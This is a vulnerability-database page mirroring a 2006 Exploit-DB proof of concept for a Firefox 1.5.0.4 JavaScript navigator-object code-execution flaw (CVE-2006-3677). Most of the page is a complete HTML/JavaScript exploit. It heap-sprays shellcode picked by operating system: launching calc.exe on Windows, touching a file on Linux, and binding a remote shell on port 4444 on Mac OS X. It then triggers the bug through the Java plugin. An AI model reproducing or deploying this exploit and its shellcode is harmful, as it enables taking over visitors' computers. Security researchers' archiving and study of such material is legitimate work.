Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution

🗓️ 28 Jul 2006 00:00:00Reported by H D MooreType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 51 Views

Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution Po

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC
28 Jul 200600:00
zdt
Tenable Nessus		Mozilla Thunderbird < 1.5.0.5 Multiple Vulnerabilities (deprecated)
28 Jul 200600:00
nessus
Tenable Nessus		Mozilla Firefox 1.5.x < 1.5.0.5 Multiple Vulnerabilities
28 Jul 200600:00
nessus
Tenable Nessus		CentOS 3 : seamonkey (CESA-2006:0608)
7 Aug 200600:00
nessus
Tenable Nessus		CentOS 4 : seamonkey (CESA-2006:0609)
7 Aug 200600:00
nessus
Tenable Nessus		CentOS 4 : Firefox (CESA-2006:0610)
4 Aug 200600:00
nessus
Tenable Nessus		CentOS 4 : thunderbird (CESA-2006:0611)
4 Aug 200600:00
nessus
Tenable Nessus		FreeBSD : mozilla -- multiple vulnerabilities (e2a92664-1d60-11db-88cf-000c6ec775d9)
28 Jul 200600:00
nessus
Tenable Nessus		GLSA-200608-02 : Mozilla SeaMonkey: Multiple vulnerabilities
4 Aug 200600:00
nessus
Tenable Nessus		GLSA-200608-03 : Mozilla Firefox: Multiple vulnerabilities
4 Aug 200600:00
nessus
Rows per page
<!--
Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC 
http://browserfun.blogspot.com/

The following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running 
on Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system. 
This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of 
Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is 
trivial to turn into a working exploit. The demonstration link below will attempt 
to launch "calc.exe" on Windows systems and "touch /tmp/METASPLOIT" on Linux systems.

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

-->

<html><body><script>

// MoBB Demonstration
function Demo() {

	// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
	// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
	// CVE-2006-3677

	// The Java plugin is required for this to work

	// win32 = calc.exe
	var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
	var fill_win32 = unescape('%u0800');
	var addr_win32 = 0x08000800;
	
	// linux = touch /tmp/METASPLOIT (unreliable)
	var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
	var fill_linux = unescape('%ua8a8');
	var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

	// mac os x ppc = bind a shell to 4444
	var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');
	var fill_macppc = unescape('%u0c0c');
	var addr_macppc = 0x0c000000;
	
	// mac os x intel = bind a shell to 4444
	// Thanks to nemo[at]felinemenace.org for shellcode
	// Thanks to Todd Manning for the target information and testing
	var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
	var fill_macx86 = unescape('%u1c1c');
	var addr_macx86 = 0x1c000000;		


	// Start the browser detection
	var shellcode;
	var addr;
	var fill;
	var ua = '' + navigator.userAgent;

	if (ua.indexOf('Linux') != -1) {
		alert('Trying to create /tmp/METASPLOIT');
		shellcode = shellcode_linux;
		addr = addr_linux;
		fill = fill_linux;
	}
	
	if (ua.indexOf('Windows') != -1) {
		alert('Trying to launch Calculator');	
		shellcode = shellcode_win32;
		addr = addr_win32;
		fill = fill_win32;
	}	

	if (ua.indexOf('PPC Mac OS') != -1) {
		alert('Trying to bind a shell to 4444');
		shellcode = shellcode_macppc;
		addr = addr_macppc;
		fill = fill_macppc;
	}	
	
	if (ua.indexOf('Intel Mac OS') != -1) {
		alert('Trying to bind a shell to 4444');
		shellcode = shellcode_macx86;
		addr = addr_macx86;
		fill = fill_macx86;
	}
			
	if (! shellcode) {
		alert('OS not supported, only attempting a crash!');
		shellcode = unescape('%ucccc');
		fill = unescape('%ucccc');
		addr = 0x02020202;
	}
		
	var b = fill;
	while (b.length <= 0x400000) b+=b;

	var c = new Array();
	for (var i =0; i<36; i++) {
		c[i] = 
			b.substring(0,  0x100000 - shellcode.length) + shellcode +
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode;
	}
			
	
	if (window.navigator.javaEnabled) {
		window.navigator = (addr / 2);
		try {
			java.lang.reflect.Runtime.newInstance(
				java.lang.Class.forName("java.lang.Runtime"), 0
			);
			alert('Patched!');
		}catch(e){
			alert('No Java plugin installed!');
		}
	}
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>

# milw0rm.com [2006-07-28]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Jul 2006 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 27.5
EPSS0.67298
javascriptnavigator objectcode executionsecurity bugfirefoxwindowslinuxmfsa2006-45tippingpointexploitbrowser detectionvulnerability
51